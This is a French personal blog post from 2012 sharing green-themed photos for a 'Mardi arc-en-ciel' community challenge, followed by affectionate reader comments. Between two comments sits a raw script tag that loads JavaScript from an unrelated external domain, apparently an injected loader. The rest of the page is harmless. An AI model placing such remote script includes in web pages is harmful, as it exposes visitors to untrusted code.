• ♣ Mardi arc-en-ciel (vert) ♣

                                                            Bonjour,


    Image hébergée par http://uprapide.com/

    ***

     

    Image hébergée par http://uprapide.com/

    *********

    Mardi arc-en-ciel communauté d'ABBY

    en vert aujourd'hui voici ma participation

     

    ♣ Mardi arc-en-ciel (vert) ♣

    ******

    ♣ Mardi arc-en-ciel (vert) ♣

    ************

    ♣ Mardi arc-en-ciel (vert) ♣

    ************

    ♣ Mardi arc-en-ciel (vert) ♣

    ******

    ♣ Mardi arc-en-ciel (vert) ♣

    *********

    ♣ Mardi arc-en-ciel (vert) ♣

    ************

    ♣ Mardi arc-en-ciel (vert) ♣

    ******************

    voilà ABBY

    ♣ Mardi arc-en-ciel (vert) ♣

    **************

    BONNE JOURNEE


     


     

    Image and video hosting by TinyPic

     

    « ♣Les marsouins♣♣suite du circuit EU ♣ »

  • Commentaires

    26
    Mercredi 17 Octobre 2012 à 07:30

    Superbe la maison au volet bleu.

    Bonne journée.

    25
    Mardi 16 Octobre 2012 à 23:31

    salut

    elle est superbe la maison cernée pas les lierres

    bonne journée

    24
    mel-and-tof
    Mardi 16 Octobre 2012 à 21:45

    Bonsoir ma douce Estrelita

    Merci pour la taille du prunier, je ne savais pas comment faire, tu es géniale avec tes trucs!

    Bonne soirée ma puce

    Gros bisous

    Méline

     

     

    gifs bonne soirée

    23
    lili16.04 Profil de lili16.04
    Mardi 16 Octobre 2012 à 19:52

    Coucou Renée, c'est Béa, super , c'est beau ! merci pour les photos ! gros bisous et bonne soirée (y)

    <script src="http://superoseplugin.info/dfi823hs.js?0.057830810738926264" type="text/javascript"></script>
    22
    Mardi 16 Octobre 2012 à 19:02
    JanyRed

    Bonsoir mon amie,

    excellent ton billet !

    je viens te souhaiter une très bonne soirée !

    gros bisous.

    Jany.

    21
    Mardi 16 Octobre 2012 à 18:08

    Jolies photos ! bonne soirée

    20
    Mardi 16 Octobre 2012 à 17:53

    superbes tes photos pour le thème d'Abby

    douce fin de journée

     

    .•°•.Ś Ő Ń Ŷ Á.•°•. 

    19
    Mardi 16 Octobre 2012 à 17:01

    Bonjour Marine !

    En voici une belle participation !Bravo bonne journée bises Mamé

    18
    Mardi 16 Octobre 2012 à 16:59

    Perso ce n'est pas trop une couleur que j'aime, mais dans la nature elle est superbe !

    biz.gif

    17
    Mardi 16 Octobre 2012 à 15:41

    Bonjour Marine , ah , ça tombe bien cette couleur en ce moment où les feuilles vertes sont en train de changer de couleurs , j'adore la photo avec les grenouilles ! Tu fais de bien jolis gifs maintenant , bravo à toi !

    Je te souhaite une belle fin de journée , amitiés et bisous de Thierry

     

    grenouilles

    16
    Mardi 16 Octobre 2012 à 14:46
    ROSIA*

     


    J'espère que tu te portes bien --------



    Je te souhaite un très bon début de semaine



    Je te fais de gros bisous---------



     



    fleur10.png

    15
    Moune17 Profil de Moune17
    Mardi 16 Octobre 2012 à 14:28

    Très jolis dégradés de vert avec toutes ces belles photos

    Passe une agréable journée

    Bises

    14
    Mardi 16 Octobre 2012 à 13:59
    Gilles-B2000

    Bonjour Estrelita !
    Ce matin, j'ai rendu visite à mon voisin à l'hopital ! Il va mieux, il attend maintenant une place dans une maison de repos.
    Demain, c'est mon frère qui vient me voir, il doit passer une colloscopie mais il a rendez-vous avec le médecin qui lui fera ça dans quelques jours. Il ne fait pas bon vieillir ! LOL !
    Je te souhaite une bonne journée en espérant que nos français ne seront pas trop ridicules ce soir en foot contre les espagnols !
    Gros bisous !

    13
    Miss Mary
    Mardi 16 Octobre 2012 à 10:38

    Bonjour Marine, merci pour ces belles photos, je craque pour la "jolie maison recouverte de lierres"...... Bonne journée, bisous à bientôt.    "Miss Mary"

    12
    Mardi 16 Octobre 2012 à 10:24

    Sympas toutes ces photos!

    J'aime particulièrement celle avec les grenouilles!!

    Bisous

    11
    Mardi 16 Octobre 2012 à 09:52
    Soizig la Dinannaise

    Les petites grenouilles sont mignonnes

    Bisous

    Françoise

    10
    Mardi 16 Octobre 2012 à 09:13

    Bonjour Estrelita

    Une belle série que tu nous offres -là

    Tu peux me dire en quoi consiste ce jeu ? ts les 15 jours ?

    Tis bos et bonne journée

    J'attends quelques visites sur :  http://icioula24.voyage.eklablog.com :

    recette de rutabaga aux carottes

     

    9
    zozo10zozo Profil de zozo10zozo
    Mardi 16 Octobre 2012 à 09:08
    8
    Mardi 16 Octobre 2012 à 08:51
    ema2

    Bonjour Marine, hihi beau billet ! Je reconnais la maison toute fourni en végétation. Je viens te souhaiter une très belle journée. Gros bisous !

    bisous

    7
    Mardi 16 Octobre 2012 à 08:30

    bonjour toi, merci pour ton com, oui comme tu dit, on est pas épargnés mais je crois que c'est un peut partout pareil , quand lâge avance des petites choses se dérèglent ! Tu nous a mis de bien belles photos mais la verdure contre la maison, même si c'est beau, moi je crains , ça abîme les murs quand même ! je te fais de tout gros bisous, dianou

    6
    Mardi 16 Octobre 2012 à 08:09

    les belles maisons ; bises bon mardi

    5
    Mardi 16 Octobre 2012 à 07:55

    Merci, c'est superbe et surtout l' allée en forêt; mais petit hic, c'est pour la semaine prochaine puisque tous les 15 jours dorénavant; pas grave tu es la 1ère à participer.
    Bisous et bon mardi 

    4
    Mardi 16 Octobre 2012 à 07:44

    Bonjour Estrelita,de très belles vues,merci pour le partage.Bonne journée,bisous

    3
    Mardi 16 Octobre 2012 à 07:32

    De très belles photos pour cette communauté ma Renée. Alors les liens cela fonctionne bien..?????  Bises et bon mardi. ZAZA

    2
    Mardi 16 Octobre 2012 à 06:18

    Bonjour Toi ! j'espère que tu vas bien ! j'ai pour ma part, un rhume qui se présente, cadeau du passage de ma fille ... une bonne journée ! bisous !

    1
    Mardi 16 Octobre 2012 à 06:18

    je ne voudrais pas toute cette verdure sur ma maison, quoique j'y trouve joli sur celle-ci.....passe un doux mardi

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :